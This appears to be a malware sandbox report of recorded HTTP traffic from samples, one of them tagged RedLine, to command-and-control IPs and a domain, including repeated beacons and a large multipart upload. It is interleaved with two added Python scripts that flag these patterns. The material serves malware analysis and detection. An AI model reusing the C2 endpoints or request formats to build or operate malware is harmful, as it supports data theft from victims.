                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://185.215.113.55/t5BnOoke2/index.php
                                                                                                                                                                                        nrbux.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        185.215.113.55:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST /t5BnOoke2/index.php HTTP/1.1
                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                        Host: 185.215.113.55
                                                                                                                                                                                        Content-Length: 84
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 200 OK
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:27:54 GMT
                                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                        Content-Length: 6
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://185.215.113.55/t5BnOoke2/index.php?scr=1
                                                                                                                                                                                        nrbux.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        185.215.113.55:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST /t5BnOoke2/index.php?scr=1 HTTP/1.1
                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=----e3f3374ff0b178337b7dde905fb87e17
                                                                                                                                                                                        Host: 185.215.113.55
                                                                                                                                                                                        Content-Length: 89452
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://iw.gamegame.info/report7.4.php
                                                                                                                                                                                        SystemNetworkService
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        104.21.21.221:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST /report7.4.php HTTP/1.1
                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
                                                                                                                                                                                        Host: iw.gamegame.info
                                                                                                                                                                                        Content-Length: 398
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 403 Forbidden
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:27:59 GMT
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        CF-Chl-Bypass: 1
                                                                                                                                                                                        Permissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                                                                                                                                        Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                        Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                        cf-request-id: 0b07b717a100004c747cb84000000001
                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=hM0SPsZIMQTYVn3HwjxgOAai6UQS9fpp7y6N0URIiaMwzjce0zMv9SOLc5ZZYgt8XG8e03ScvabKVcQgmzaz6UmT6T%2B1S%2BirUYJJbiDsTBYHQVisCKe5iQi9zNLf7Q%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                        NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                        CF-RAY: 6686279f6e914c74-AMS
                                                                                                                                                                                        alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://87.251.71.195:82/
                                                                                                                                                                                        arnatic_7.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        87.251.71.195:82
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST / HTTP/1.1
                                                                                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                                                                                        Host: 87.251.71.195:82
                                                                                                                                                                                        Content-Length: 137
                                                                                                                                                                                        Expect: 100-continue
                                                                                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                                                                                        Connection: Keep-Alive
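The three traffic patterns captured above are worth pulling apart: arnatic_7.exe talks to the RedLine C2 extracted in Malware Config (87.251.71.195:82) over WCF SOAP in the default tempuri.org namespace (SOAPAction "http://tempuri.org/Endpoint/GetArguments"), the SystemNetworkService check-ins to iw.gamegame.info all come back as Cloudflare challenge pages (403 with CF-Chl-Bypass: 1, so the bot never reaches its server but the server is not necessarily dead), and nrbux.exe sends a small form-urlencoded POST to /t5BnOoke2/index.php followed by an 89 KB multipart POST to the same path with ?scr=1. The following triage script is an added example, not part of the tria.ge report: the raw messages are constructed from the request and response lines shown on this page, and the tag names, the 50 KB upload threshold and the beacon-then-upload heuristic are this example's own assumptions.

```python
"""Tag the HTTP exchanges captured in the sandbox run (added example)."""
from urllib.parse import urlsplit

# Constructed from the page: (process, url, raw request head, raw response head or "")
CAPTURED = [
    ("arnatic_7.exe", "http://87.251.71.195:82/",
     "POST / HTTP/1.1\r\n"
     "Content-Type: text/xml; charset=utf-8\r\n"
     'SOAPAction: "http://tempuri.org/Endpoint/GetArguments"\r\n'
     "Host: 87.251.71.195:82\r\n"
     "Content-Length: 137\r\n"
     "Expect: 100-continue\r\n\r\n", ""),
    ("SystemNetworkService", "http://iw.gamegame.info/report7.4.php",
     "POST /report7.4.php HTTP/1.1\r\n"
     "Content-Type: application/x-www-form-urlencoded\r\n"
     "Host: iw.gamegame.info\r\n"
     "Content-Length: 398\r\n\r\n",
     "HTTP/1.1 403 Forbidden\r\n"
     "Content-Type: text/html; charset=UTF-8\r\n"
     "CF-Chl-Bypass: 1\r\n"
     "Server: cloudflare\r\n\r\n"),
    ("nrbux.exe", "http://185.215.113.55/t5BnOoke2/index.php",
     "POST /t5BnOoke2/index.php HTTP/1.1\r\n"
     "Content-Type: application/x-www-form-urlencoded\r\n"
     "Host: 185.215.113.55\r\n"
     "Content-Length: 84\r\n\r\n",
     "HTTP/1.1 200 OK\r\n"
     "Server: Apache/2.4.41 (Ubuntu)\r\n"
     "Content-Length: 6\r\n\r\n"),
    ("nrbux.exe", "http://185.215.113.55/t5BnOoke2/index.php?scr=1",
     "POST /t5BnOoke2/index.php?scr=1 HTTP/1.1\r\n"
     "Content-Type: multipart/form-data; boundary=----e3f3374ff0b178337b7dde905fb87e17\r\n"
     "Host: 185.215.113.55\r\n"
     "Content-Length: 89452\r\n\r\n", ""),
]

# RedLine C2 as extracted by the sandbox (Malware Config section of this report).
REDLINE_C2 = {"87.251.71.195:82"}
UPLOAD_THRESHOLD = 50_000  # bytes; assumed cut-off for "large" multipart bodies


def parse_message(raw):
    """Split an HTTP message head into (start line, headers).
    Header names are case-insensitive, so they are lower-cased."""
    lines = raw.split("\r\n\r\n", 1)[0].split("\r\n")
    headers = {}
    for line in lines[1:]:
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()
    return lines[0], headers


def status_code(raw_response):
    """Status code of a response, or None when no response was captured."""
    if not raw_response:
        return None
    start, _ = parse_message(raw_response)
    return int(start.split()[1])


def classify(process, url, raw_req, raw_resp):
    """Tags for one captured POST; each rule is explained where it fires."""
    tags = []
    u = urlsplit(url)
    _, req = parse_message(raw_req)
    # RedLine's C2 is a WCF SOAP service left in the default tempuri.org
    # namespace; the operation name (GetArguments here) is the last path element.
    soap_action = req.get("soapaction", "").strip('"')
    if soap_action.startswith("http://tempuri.org/Endpoint/"):
        op = soap_action.rsplit("/", 1)[-1]
        tags.append(f"redline-soap-c2:{op}" if u.netloc in REDLINE_C2 else f"tempuri-soap:{op}")
    if u.port not in (None, 80, 443):
        tags.append("nonstandard-port")
    if status_code(raw_resp) == 403:
        _, resp = parse_message(raw_resp)
        # Cloudflare served a challenge page: the bot cannot solve it, so this
        # check-in failed, but the origin behind Cloudflare may still be live.
        if resp.get("cf-chl-bypass") == "1":
            tags.append("cloudflare-challenge-blocked")
    ctype = req.get("content-type", "")
    length = int(req.get("content-length", "0"))
    if ctype.startswith("multipart/form-data") and length > UPLOAD_THRESHOLD:
        tags.append("large-multipart-upload")
    return tags


def triage(captured=CAPTURED):
    """Map (process, url) -> tags, then apply one cross-request heuristic
    (assumption): a form-urlencoded POST to a path followed by a large multipart
    POST to the same host and path from the same process is beacon-then-upload."""
    result = {(p, url): classify(p, url, rq, rs) for p, url, rq, rs in captured}
    beacons = set()
    for p, url, rq, _ in captured:
        _, req = parse_message(rq)
        key = (p, urlsplit(url).netloc, urlsplit(url).path)  # query string dropped
        if req.get("content-type", "").startswith("application/x-www-form-urlencoded"):
            beacons.add(key)
        elif key in beacons and "large-multipart-upload" in result[(p, url)]:
            result[(p, url)].append("beacon-then-upload")
    return result


if __name__ == "__main__":
    for (proc, url), tags in triage().items():
        print(f"{proc:22} {url:50} {', '.join(tags) or '-'}")
```

Run stand-alone it prints one line per captured POST with its tags. The parser works on the request and response heads exactly as the report shows them, so the same functions can be pointed at a PCAP-derived HTTP log; the 403 rule is the caveat to carry into an investigation: a Cloudflare challenge response is a failed check-in from the bot's point of view, not evidence that the C2 domain has been taken down.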
• POST
http://iw.gamegame.info/report7.4.php
SystemNetworkService
Remote address:
104.21.21.221:80
Request
POST /report7.4.php HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Host: iw.gamegame.info
Content-Length: 398
Connection: Keep-Alive
Cache-Control: no-cache
Response
HTTP/1.1 403 Forbidden
Date: Fri, 02 Jul 2021 07:28:10 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
CF-Chl-Bypass: 1
Permissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                                                                                                                                        Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                        Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                        cf-request-id: 0b07b73f920000d8d10c2bb000000001
                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=LzCKy0xIAMIMCblHtBmJuRjX7hzk9xJT0NHaickKPFf5CdvYtkv%2FZn7b8B3%2BtUnt7Gij%2FSBbVdsSQMyLU5DvMrDGa32NDkxGqf4KDTuQJLSSM0CMSSciBcXF1Ydc4A%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                        NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                        CF-RAY: 668627df5f90d8d1-AMS
                                                                                                                                                                                        alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
• POST http://iw.gamegame.info/report7.4.php
SystemNetworkService
Remote address: 104.21.21.221:80
Request
POST /report7.4.php HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Host: iw.gamegame.info
Content-Length: 398
Connection: Keep-Alive
Cache-Control: no-cache
Response
HTTP/1.1 403 Forbidden
Date: Fri, 02 Jul 2021 07:28:20 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
CF-Chl-Bypass: 1
Permissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 01 Jan 1970 00:00:01 GMT
X-Frame-Options: SAMEORIGIN
cf-request-id: 0b07b767ae0000c779be37d000000001
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=cPl9xdNXS0PpSgiTUCn2TzfPywtlxaEql3%2FS6Pmv9w2Eb%2FHhyqaRx5v%2BQDd3DtmfSux1UteoRVx0mvW%2BRs13qw2CadplwIfOUekGaJkM2bEVdkkmvXU6TDIc2RXwXA%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 6686281f782ec779-AMS
alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
• POST http://87.251.71.195:82/
arnatic_7.exe
Remote address: 87.251.71.195:82
Request
POST / HTTP/1.1
Content-Type: text/xml; charset=utf-8
SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
Host: 87.251.71.195:82
Content-Length: 137
Expect: 100-continue
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
• POST http://87.251.71.195:82/
arnatic_7.exe
Remote address: 87.251.71.195:82
Request
POST / HTTP/1.1
Content-Type: text/xml; charset=utf-8
SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
Host: 87.251.71.195:82
Content-Length: 137
Expect: 100-continue
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
• POST http://iw.gamegame.info/report7.4.php
SystemNetworkService
Remote address: 104.21.21.221:80
Request
POST /report7.4.php HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Host: iw.gamegame.info
Content-Length: 398
Connection: Keep-Alive
Cache-Control: no-cache
Response
HTTP/1.1 403 Forbidden
Date: Fri, 02 Jul 2021 07:28:30 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
CF-Chl-Bypass: 1
Permissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 01 Jan 1970 00:00:01 GMT
X-Frame-Options: SAMEORIGIN
cf-request-id: 0b07b78f480000164988b29000000001
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=UmJ1d9IxXlm7WAydS1Gyg1UVTapbF%2FvMydBdCoJGJa77WZGEjiVReZKks1bZ%2FQohLmc1Zp4EY9YH41hgIbFbZhMkFghi%2BrnVaqGzfsfzaKAtURegpjKKLVC9RCKXtA%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 6686285eda6d1649-MUC
alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
• POST http://iw.gamegame.info/report7.4.php
SystemNetworkService
Remote address: 104.21.21.221:80
Request
POST /report7.4.php HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Host: iw.gamegame.info
Content-Length: 398
Connection: Keep-Alive
Cache-Control: no-cache
Response
HTTP/1.1 403 Forbidden
Date: Fri, 02 Jul 2021 07:28:40 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
CF-Chl-Bypass: 1
Permissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 01 Jan 1970 00:00:01 GMT
X-Frame-Options: SAMEORIGIN
cf-request-id: 0b07b7b6da00001bbde5090000000001
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=B74JPpGR%2FoMvBvM1ezcSEfgjshnpZbI8kAtIkvMxOJIdiKEZWBTo7yDK37IXxHAeOZMjfQJ3lj7yYB9TOxLcIGegf1gc%2Be%2BfxYjiTYd%2FjtduYvLnkUEQIm1Z9NJ9wg%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 6686289e2d861bbd-MUC
alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://iw.gamegame.info/report7.4.php
                                                                                                                                                                                        SystemNetworkService
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        104.21.21.221:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST /report7.4.php HTTP/1.1
                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
                                                                                                                                                                                        Host: iw.gamegame.info
                                                                                                                                                                                        Content-Length: 398
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 403 Forbidden
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:28:50 GMT
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        CF-Chl-Bypass: 1
                                                                                                                                                                                        Permissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                                                                                                                                        Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                        Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                        cf-request-id: 0b07b7de940000d44f7ea02000000001
                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=VyWO0NXD5xQRwobl6Za4ryUoJBTJFPk%2BO9vyGVOPtUAU7kJ8vSrcRxvE%2FgZlkJidtgbQhYB52HzBddXUfqO%2FpxyHYENIGHU40aPMDqxfQB275RP%2BAV2uiSRJzuKp7w%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                        NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                        CF-RAY: 668628ddba5fd44f-HAM
                                                                                                                                                                                        alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://185.215.113.55/t5BnOoke2/index.php
                                                                                                                                                                                        nrbux.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        185.215.113.55:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST /t5BnOoke2/index.php HTTP/1.1
                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                        Host: 185.215.113.55
                                                                                                                                                                                        Content-Length: 84
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 200 OK
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:28:54 GMT
                                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                        Content-Length: 6
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://iw.gamegame.info/report7.4.php
                                                                                                                                                                                        SystemNetworkService
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        104.21.21.221:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST /report7.4.php HTTP/1.1
                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
                                                                                                                                                                                        Host: iw.gamegame.info
                                                                                                                                                                                        Content-Length: 398
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 403 Forbidden
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:29:01 GMT
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        CF-Chl-Bypass: 1
                                                                                                                                                                                        Permissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                                                                                                                                        Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                        Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                        cf-request-id: 0b07b80735000019c77eaf3000000001
                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=8Rwzt3kVgUvcUMHrsDuTSiSFMkFDH9DAMJsTkWEQaIHmyrPfM3wsqgoTag10dPCgA06B%2Brmhfi0wlMK6WLCAULn4%2FKbcl1%2Btgr4nuy7udaxqlt3WXUoIhiuyHauuAg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                        NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                        CF-RAY: 6686291ebb7219c7-EWR
                                                                                                                                                                                        alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://87.251.71.195:82/
                                                                                                                                                                                        arnatic_7.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        87.251.71.195:82
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST / HTTP/1.1
                                                                                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                                                                                        Host: 87.251.71.195:82
                                                                                                                                                                                        Content-Length: 137
                                                                                                                                                                                        Expect: 100-continue
                                                                                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                                                                                        Connection: Keep-Alive
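
Three distinct behaviours sit in the requests above: SystemNetworkService posting a fixed 398-byte body to report7.4.php every ten seconds or so and getting a Cloudflare challenge (403 with CF-Chl-Bypass) every time; nrbux.exe posting a form body straight to a bare IP with no User-Agent; and arnatic_7.exe issuing a SOAP call whose SOAPAction, http://tempuri.org/Endpoint/GetArguments, is the WCF contract RedLine's C2 exposes. The Python below is an added example and is not tria.ge output or tooling: it parses the one-field-per-line layout of this listing and applies three rules to it. The embedded sample is constructed from the requests shown on this page with response headers abbreviated; the rule names are the example's own.

```python
"""Flag C2 patterns in a tria.ge-style HTTP listing. Added example, not part of
the sandbox report: it parses the one-field-per-line layout on this page and
BEACON/OTHER are constructed from requests shown there, headers abbreviated."""
import re
from collections import defaultdict

METHODS = {"GET", "POST", "PUT", "HEAD"}
IP_HOST = re.compile(r"^https?://\d{1,3}(?:\.\d{1,3}){3}(?::\d+)?/")

def parse_listing(text):
    """Split the listing into record dicts; header names are lower-cased."""
    lines = [l for l in map(str.strip, text.splitlines()) if l and not l.startswith("•")]
    records, i = [], 0
    while i < len(lines):
        if lines[i] not in METHODS or i + 4 >= len(lines) or not lines[i + 1].startswith("http"):
            i += 1
            continue
        rec = dict(method=lines[i], url=lines[i + 1], process=lines[i + 2],
                   remote=lines[i + 4], req={}, status="", resp={})
        i, section = i + 5, None
        while i < len(lines) and lines[i] not in METHODS:  # up to the next bare method line
            line = lines[i]
            if line in ("Request", "Response"):
                section = line
            elif section == "Response" and line.startswith("HTTP/"):
                rec["status"] = line.split()[1]
            elif section and ":" in line and not line.endswith("HTTP/1.1"):
                name, _, value = line.partition(":")
                rec["req" if section == "Request" else "resp"][name.strip().lower()] = value.strip()
            i += 1
        records.append(rec)
    return records

def detect(records):
    """Return (rule, process, where, detail) tuples for three C2 patterns."""
    findings = []
    for r in records:
        # RedLine's C2 is a WCF service using the default tempuri.org namespace and an
        # "Endpoint" contract; the SOAPAction carries the method name.
        soap = r["req"].get("soapaction", "").strip('"')
        if soap.startswith("http://tempuri.org/Endpoint/"):
            findings.append(("redline-wcf-c2", r["process"], r["remote"], soap.rsplit("/", 1)[-1]))
        # Form POST straight to a bare IP with no User-Agent: a loader check-in, not a browser (heuristic only).
        if (r["method"] == "POST" and IP_HOST.match(r["url"]) and "user-agent" not in r["req"]
                and r["req"].get("content-type", "").startswith("application/x-www-form-urlencoded")):
            findings.append(("raw-ip-post-no-ua", r["process"], r["remote"], r["url"]))
    # Same process, URL and body size over and over: a beacon. A Cloudflare challenge
    # (403 + CF-Chl-Bypass) blocks the upload at the edge; it does not stop the malware.
    groups = defaultdict(list)
    for r in records:
        groups[(r["process"], r["url"], r["req"].get("content-length"))].append(r)
    for (proc, url, size), rs in groups.items():
        if len(rs) >= 3:
            challenged = sum(r["status"] == "403" and "cf-chl-bypass" in r["resp"] for r in rs)
            findings.append(("fixed-size-beacon", proc, url,
                             f"{len(rs)} POSTs of {size} bytes, {challenged} challenged by Cloudflare"))
    return findings

BEACON = """\
• flag-unknown
POST
http://iw.gamegame.info/report7.4.php
SystemNetworkService
Remote address:
104.21.21.221:80
Request
POST /report7.4.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Host: iw.gamegame.info
Content-Length: 398
Response
HTTP/1.1 403 Forbidden
CF-Chl-Bypass: 1
"""
OTHER = """\
• flag-unknown
POST
http://185.215.113.55/t5BnOoke2/index.php
nrbux.exe
Remote address:
185.215.113.55:80
Request
POST /t5BnOoke2/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 84
Response
HTTP/1.1 200 OK
• flag-unknown
POST
http://87.251.71.195:82/
arnatic_7.exe
Remote address:
87.251.71.195:82
Request
POST / HTTP/1.1
Content-Type: text/xml; charset=utf-8
SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
"""
SAMPLE = BEACON + OTHER + BEACON + BEACON   # three identical beacons, as on the page
```

Run `detect(parse_listing(SAMPLE))` to get one finding per rule. The beacon rule only fires after three same-size POSTs, so lower or raise that threshold to match the capture window; and a challenge page from Cloudflare means the request was stopped at the edge, not that the host is clean, so the repeated 403s here are still a detection, not a false alarm.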

POST
http://iw.gamegame.info/report7.4.php
SystemNetworkService
Remote address:
104.21.21.221:80
Request
POST /report7.4.php HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Host: iw.gamegame.info
Content-Length: 398
Connection: Keep-Alive
Cache-Control: no-cache
Response
HTTP/1.1 403 Forbidden
Date: Fri, 02 Jul 2021 07:29:12 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
CF-Chl-Bypass: 1
